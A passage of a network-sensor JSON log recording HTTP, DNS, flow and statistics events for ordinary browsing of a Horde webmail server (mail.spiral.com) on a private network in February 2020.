:0,"memcap_global":0},"http":{"memuse":108612,"memcap":0}}} {"timestamp":"2020-02-29T00:04:19.076294+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18583,"tx_id":2}} {"timestamp":"2020-02-29T00:04:20.000426+0000","flow_id":1742161835436144,"event_type":"flow","src_ip":"192.168.10.122","src_port":57837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.108656+0000","end":"2020-02-28T23:59:19.216503+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:20.000623+0000","flow_id":1755910025764076,"event_type":"flow","src_ip":"192.168.10.122","src_port":44575,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.318700+0000","end":"2020-02-28T23:59:19.430067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:21.000491+0000","flow_id":2181365191206253,"event_type":"flow","src_ip":"192.168.10.122","src_port":54269,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:20.386413+0000","end":"2020-02-28T23:59:20.494438+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:22.216488+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58517,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:22.410696+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:04:22.953806+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":28190,"tx_id":2}} {"timestamp":"2020-02-29T00:04:22.963363+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28444,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.150300+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687}} {"timestamp":"2020-02-29T00:04:23.537409+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":609,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.725396+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26993,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.000640+0000","flow_id":2096445098018283,"event_type":"flow","src_ip":"192.168.10.122","src_port":37955,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:23.902635+0000","end":"2020-02-28T23:59:24.013986+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:25.424689+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:25.434576+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10868,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.641290+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661}} {"timestamp":"2020-02-29T00:04:26.000170+0000","event_type":"stats","stats":{"uptime":13918,"capture":{"kernel_packets":133165,"kernel_drops":0},"decoder":{"pkts":133216,"bytes":92285631,"invalid":181,"ipv4":131779,"ipv6":8,"ethernet":133216,"raw":0,"null":0,"sll":0,"tcp":126720,"udp":4864,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2218,"failed_udp":108},"tx":{"http":4508,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2295}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2257,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23144,"memcap_state":0,"memcap_global":0},"http":{"memuse":205896,"memcap":0}}} {"timestamp":"2020-02-29T00:04:26.001199+0000","flow_id":1755149832342807,"event_type":"flow","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1481,"bytes_toclient":6174,"start":"2020-02-29T00:03:20.445719+0000","end":"2020-02-29T00:03:25.703240+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:28.151153+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:04:29.486791+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18961,"tx_id":1}} {"timestamp":"2020-02-29T00:04:29.495288+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57135,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30120,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:29.600386+0000","flow_id":1612243390009016,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57135,"proto":"UDP","dns":{"type":"answer","id":30120,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:29.722668+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170}} {"timestamp":"2020-02-29T00:04:32.103218+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46632,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.211965+0000","flow_id":1403928886416178,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46632,"proto":"UDP","dns":{"type":"answer","id":39270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:04:32.263616+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:04:32.278299+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47715,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64802,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:32.386792+0000","flow_id":1188136844541723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47715,"proto":"UDP","dns":{"type":"answer","id":64802,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:32.455299+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:04:33.000372+0000","event_type":"stats","stats":{"uptime":13925,"capture":{"kernel_packets":133240,"kernel_drops":0},"decoder":{"pkts":133250,"bytes":92298822,"invalid":181,"ipv4":131811,"ipv6":8,"ethernet":133250,"raw":0,"null":0,"sll":0,"tcp":126746,"udp":4870,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2220,"failed_udp":109},"tx":{"http":4510,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2297}},"flow_mgr":{"closed_pruned":2672,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":104482,"memcap":0}}} {"timestamp":"2020-02-29T00:04:34.727684+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5170},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21414,"tx_id":2}} {"timestamp":"2020-02-29T00:04:37.456381+0000","flow_id":1694633747830855,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34732,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067},"app_proto":"http","fileinfo":{"filename":"\/turba\/search.php","state":"CLOSED","stored":false,"size":19290,"tx_id":1}} {"timestamp":"2020-02-29T00:04:38.001135+0000","flow_id":686372991301585,"event_type":"flow","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1393,"bytes_toclient":6242,"start":"2020-02-29T00:03:32.227281+0000","end":"2020-02-29T00:03:37.538580+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:40.000262+0000","event_type":"stats","stats":{"uptime":13932,"capture":{"kernel_packets":133273,"kernel_drops":0},"decoder":{"pkts":133276,"bytes":92306829,"invalid":181,"ipv4":131835,"ipv6":8,"ethernet":133276,"raw":0,"null":0,"sll":0,"tcp":126766,"udp":4874,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099648},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2694,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2710,"synack":2701,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1737,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2222,"failed_udp":109},"tx":{"http":4512,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2299}},"flow_mgr":{"closed_pruned":2673,"new_pruned":15,"est_pruned":2258,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24137,"memcap_state":0,"memcap_global":0},"http":{"memuse":35710,"memcap":0}}} {"timestamp":"2020-02-29T00:04:40.321905+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27442,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:40.431524+0000","flow_id":384277881088369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53660,"proto":"UDP","dns":{"type":"answer","id":27442,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:40.588219+0000","flow_id":2068106924568790,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} 